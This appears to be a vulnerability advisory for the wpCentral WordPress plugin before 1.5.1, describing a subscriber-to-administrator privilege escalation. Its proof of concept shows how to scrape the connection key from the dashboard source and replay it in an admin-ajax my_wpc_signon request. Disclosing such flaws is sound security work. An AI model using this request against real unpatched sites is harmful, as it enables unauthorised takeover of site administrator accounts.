WordPress Plugin Vulnerabilities
wpCentral < 1.5.1 - Improper Access Control to Privilege Escalation
Description
The flaw allowed anybody to escalate their privileges to those of an administrator, as long as subscriber-level registration was enabled on a given WordPress site with the vulnerable plugin installed.
Proof of Concept
1. Log in as Subscriber. 2. Scrape the page (/wp-admin/index.php) for the connection key. (i.e. view source and search for "Connection Key") Copy the key. Excerpt: <div style="text-align:center; font-weight:bold;"><p style="margin-bottom: 4px;margin-top: 20px;">wpCentral Connection Key</p></div> <div style="padding: 10px;background-color: #fafafa;border: 1px solid black;border-radius: 10px;font-weight: bold;font-size: 14px;text-align: center;">lsgp0jlf3hjnaudtozswglpdva4xodnd94hcu5qb81dzdpt4y3iagwerwbwukmcw78g2dihphluqxagvo7dmm0igxamp2cw58jan0jvjhmv7dh953ububhnuimkgnmlk</div> </div><script type="text/javascript"> Extracted key: lsgp0jlf3hjnaudtozswglpdva4xodnd94hcu5qb81dzdpt4y3iagwerwbwukmcw78g2dihphluqxagvo7dmm0igxamp2cw58jan0jvjhmv7dh953ububhnuimkgnmlk Log out. 3. Send the following request with the connection key pasted where it says "Auth_key_here" /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key=[AUTH_KEY_HERE] 4. Should now be logged in as user 1 -- presumably administrative user.
Affects Plugins
Fixed in version 1.5.1
References
Classification
Miscellaneous
Original Researcher
Chloe Chamberland
Submitter
Chloe Chamberland
Submitter website
Submitter twitter
Verified
No
Timeline
Publicly Published
2020-02-17 (about 3 years ago)
Added
2020-02-17 (about 3 years ago)
Last Updated
2020-09-22 (about 3 years ago)